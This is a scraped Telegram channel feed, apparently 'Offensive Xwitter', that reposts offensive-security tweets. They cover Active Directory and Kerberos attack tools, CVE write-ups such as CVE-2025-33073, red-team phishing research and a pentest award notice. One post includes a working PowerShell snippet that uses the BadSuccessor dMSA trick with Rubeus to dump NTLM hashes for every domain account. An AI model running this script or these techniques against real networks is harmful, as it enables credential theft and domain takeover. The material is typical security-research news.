NEW BOT Телеграм, страница

Offensive Xwitter

😈 [ David Kennedy @Cyb3rC3lt ]

Python version of BadSuccessor by Cybrly.

🔗 https://github.com/cybrly/badsuccessor

🐥 [ tweet ]

🔥6👍3🥱2

5.42K views14:42

Offensive Xwitter

0:26

This media is not supported in your browser

VIEW IN TELEGRAM

😈 [ Yuval Gordon @YuG0rd ]

Many missed this on #BadSuccessor: it’s also a credential dumper.
I wrote a simple PowerShell noscript that uses Rubeus to dump Kerberos keys and NTLM hashes for every principal-krbtgt, users, machines. no DCSync required, no code execution on DC.

🐥 [ tweet ]

какой же разъеб 😂🤣

upd. автор делает что-то типа такого, если что, со своей версией рубеуса:

$domain = Get-ADDomain
$dmsa = "CN=mydmsa,CN=Managed Service Accounts,$($domain.DistinguishedName)"
$allDNs = @(Get-ADUser -Filter * | select @{n='DN';e={$_.DistinguishedName}}, sAMAccountName) `
        + @(Get-ADComputer -Filter * | select @{n='DN';e={$_.DistinguishedName}}, sAMAccountName)
$allDNs | % {
    Set-ADObject -Identity $dmsa -Replace @{ "msDS-ManagedAccountPrecededByLink" = $_.DN }
    $res = Invoke-Rubeus asktgs /targetuser:mydmsa$ /service:"krbtgt/$($domain.DNSRoot)" /opsec /dmsa /nowrap /ticket:$kirbi
    $rc4 = [regex]::Match($res, 'Previous Keys for .*\$: \(rc4_hmac\) ([A-F0-9]{32})').Groups[1].Value
    "$($_.sAMAccountName):$rc4"
}

😁13🔥9🥱2

6.8K viewsedited 14:18

Offensive Xwitter

😈 [ Matt Ehrnschwender @M_alphaaa ]

I'm finally releasing a project that I've been working on for a little while now. Here's Boflink, a linker for Beacon Object Files.

🔗 https://github.com/MEhrn00/boflink

Supporting blog post about it.

🔗 https://blog.cybershenanigans.space/posts/boflink-a-linker-for-beacon-object-files/

🐥 [ tweet ]

🍌7😁1

5.59K views21:26

Offensive Xwitter

Forwarded from PT SWARM

0:29

This media is not supported in your browser

VIEW IN TELEGRAM

⚠️ We've reproduced CVE-2025-49113 in Roundcube.

This vulnerability allows authenticated users to execute arbitrary commands via PHP object deserialization.

If you're running Roundcube — update immediately!

🔥25🥱1🍌1

4.18K views17:22

Offensive Xwitter

😈 [ Aditya Telange @adityatelange ]

evil-winrm-py v1 released🌟

🔗 https://github.com/adityatelange/evil-winrm-py/releases/tag/v1.0.0

🐥 [ tweet ]

👍6🔥6

6.19K views03:43

Offensive Xwitter

😈 [ Fabian @testert01 ]

Unconstrained Delegation on a gMSA and Webclient / NTLMv1 active on servers that can retrieve the credentials of a gMSA with unconstrained delegation can lead to a complete domain compromise from domain users.

@micahvandeusen, @_dirkjan, nice tools :)

🔗 https://nothingspecialforu.github.io/UCgMSAExploitation/

🐥 [ tweet ]

👍6

5.51K viewsedited 07:40

Offensive Xwitter

😈 [ mr.d0x @mrd0x ]

Finally had some time to publish these blogs. Enjoy!

Spying On Screen Activity Using Chromium Browsers

🔗 https://mrd0x.com/spying-with-chromium-browsers-screensharing/

Camera and Microphone Spying Using Chromium Browsers

🔗 https://mrd0x.com/spying-with-chromium-browsers-camera/

🐥 [ tweet ]

👍7🥱4

5.89K views10:06

Offensive Xwitter

0:15

This media is not supported in your browser

VIEW IN TELEGRAM

😁27🥱2

7.59K views13:58

Offensive Xwitter

2:07

This media is not supported in your browser

VIEW IN TELEGRAM

😈 [ James Woolley @Xtrato ]

I left a server online with VNC wide open to see how it would be interacted with. This is one of the more interesting interactions 👆

🐥 [ tweet ]

🥱20🍌7👍5😁3🤯1

6.37K views19:09

Offensive Xwitter

😈 [ RedTeam Pentesting @RedTeamPT ]

🚨 Our new blog post about Windows CVE-2025-33073 which we discovered is live.

🪞 The Reflective Kerberos Relay Attack - Remote privilege escalation from low-priv user to SYSTEM with RCE by applying a long forgotten NTLM relay technique to Kerberos:

🔗 https://blog.redteam-pentesting.de/2025/reflective-kerberos-relay-attack/

👀 We have also released a paper which really goes into the nitty-gritty for those who are interested:

🔗 https://www.redteam-pentesting.de/publications/2025-06-11-Reflective-Kerberos-Relay-Attack_RedTeam-Pentesting.pdf

🐥 [ tweet ]

🔥11

7.88K viewsedited 08:29

Offensive Xwitter

😈 [ Synacktiv @Synacktiv ]

Microsoft just released the patch for CVE-2025-33073, a critical vulnerability allowing a standard user to remotely compromise any machine with SMB signing not enforced! Checkout the details in the blogpost by @yaumn_ and @wil_fri3d.

🔗 https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025

🐥 [ tweet ]

🥱8👍4

8.47K views06:08

Offensive Xwitter

😈 [ Praetorian @praetorianlabs ]

🚨 New attack disclosed: GitHub Device Code Phishing

John, Matt, and Mason reveal how they've been using this technique to compromise F500 orgs with high success rates.

📖 Blog covers methodology, red team case studies & detection strategies

🔗 https://www.praetorian.com/blog/introducing-github-device-code-phishing/

🐥 [ tweet ]

🔥7

5.7K views09:33

Offensive Xwitter

😈 [ Jonathan Beierle @hullabrian ]

I just released COMmander - a .NET tool designed to provide an easy to use interface for COM and RPC based attacks. It taps into the Microsoft-Windows-RPC ETW provider and allows you to provide a customizable rule set for detections.

🔗 https://github.com/HullaBrian/COMmander

🐥 [ tweet ]

🔥4👍1

4K views06:02

Offensive Xwitter

Forwarded from Positive Technologies

👽 Взлом крупных финансовых компаний — это не только цель хакеров, но и челлендж для редтимеров из PT SWARM

Как ребята готовились и проводили атаки при помощи социальной инженерии, что из этого вышло и чем помогло клиентам, подробно рассказал в своей статье для Positive Research Константин Полишин, руководитель группы Red Team SE отдела тестирования на проникновение Positive Technologies.

Вы удивитесь, как много можно узнать о компании, применяя лишь методы пассивной разведки. Например, используемый стек технологий легко находится в вакансиях для айтишников и резюме сотрудников. А корпоративные адреса — в публичных утечках данных и логах инфостилеров. А уж если искать информацию активно — можно собрать из разных источников целые досье на предполагаемых жертв.

🎣 Дальше остается тщательно подобрать фокус-группу, разработать фишинговый сценарий и раз за разом забрасывать удочку, пока не сработает. Для этого редтимеры (как и предполагаемые злоумышленники) тщательно изучают содержимое почтовых ящиков, ключевые слова в письмах, корпоративный стиль общения, внутреннюю жизнь и процессы в компании.

👽

👽 Хотите посмотреть на атаку изнутри в мельчайших деталях? Читайте ~~крутое журналистское расследование~~ новый материал в нашем медиа.

#PositiveResearch
@Positive_Technologies

Please open Telegram to view this post

VIEW IN TELEGRAM

👍9🍌4

4.72K views13:26

Offensive Xwitter

😈 [ Elastic Security Labs @elasticseclabs ]

Dive deep into malware detection with the latest article by John Uhlmann: "Call Stacks: No More Free Passes for Malware." Discover how call stacks provide vital insights into malware behavior. Read more:

🔗 https://www.elastic.co/security-labs/call-stacks-no-more-free-passes-for-malware/

🐥 [ tweet ]

👍3🔥2

4.96K views05:36

Offensive Xwitter

😈 [ SpecterOps @SpecterOps ]

Introducing the BloodHound Query Library!

📚 https://queries.specterops.io/

@martinsohndk & @joeydreijer explore the new collection of Cypher queries designed to help BloodHound users to unlock the full potential of the BloodHound platform by creating an open query ecosystem.

🔗 https://specterops.io/blog/2025/06/17/introducing-the-bloodhound-query-library/

🐥 [ tweet ]

🔥11

5.74K views19:35

Offensive Xwitter

😈 [ Alex Neff @al3x_n3ff ]

Did you know that you can kerberoast without any valid credentials? All you need is an account that is ASREProastable.
This allows you to request service tickets for any account with a set SPN🔥

NetExec now has a native implementation of this technique, thanks to Azox

🐥 [ tweet ]

🔥17🥱6👍2

5.23K views19:43

Offensive Xwitter

😈 [ Adam Chester 🏴‍☠️ @_xpn_ ]

My second blog post of the month is up. Nothing too crazy, this time I’m looking at the upcoming Windows Administrator Protection feature… How it works, what continues to work, and some reversing. Check it out (or not I’m not your mum!)

🔗 https://specterops.io/blog/2025/06/18/administrator-protection/

🐥 [ tweet ]

👍4🤔1

4.37K views11:15

Offensive Xwitter

Успейте подать заявку на Pentest Award 2025 до 30 июня!

Это отраслевая награда для специалистов по тестированию на проникновение, которая проводится уже в третий раз. Основная задача премии — выделить лучших специалистов и показать их вклад в развитие российского пентеста.

Участие бесплатное, финалисты получат технику apple и максимальный почет сообщества этичных хакеров. Церемония награждения будет проходить 1 августа в Москве.

Заявка на премию — это рассказ о лучшем проекте в свободной форме. Не нужно раскрывать эксплоиты, любые шаги в цепочке эксплуатации могут быть полностью анонимны, а детали могут быть скрыты, важно отразить сам подход и идею.

Подать заявку и узнать больше информации можно на сайте — https://award.awillix.ru/

🔥7🍌4👍1

11.4K views11:24

Offensive Xwitter

This media is not supported in your browser

VIEW IN TELEGRAM

😈 [ Alex Neff @al3x_n3ff ]

Releasing a side project of mine: wsuks - automating the WSUS mitm attack🔥

🔗 https://github.com/NeffIsBack/wsuks

TL;DR:

If the Windows Server Update Service (WSUS) is configured to use HTTP instead of HTTPS, it's possible to take control of any Windows machine on your local network.

🐥 [ tweet ]

🔥15👍3🤔1

8.54K views16:06

Offensive Xwitter

😈 [ Andrew @4ndr3w6S ]

Happy to finally share a new blog with @exploitph on our work revisiting the Kerberos Diamond Ticket.

✅ /opsec for a more genuine flow
✅ /ldap to populate the PAC
🆕 Forge a diamond service ticket using an ST

We finally gave it a proper cut 💎

🔗 https://www.huntress.com/blog/recutting-the-kerberos-diamond-ticket

🐥 [ tweet ]

🔥4

5.52K views11:42

About

Blog

Apps

Platform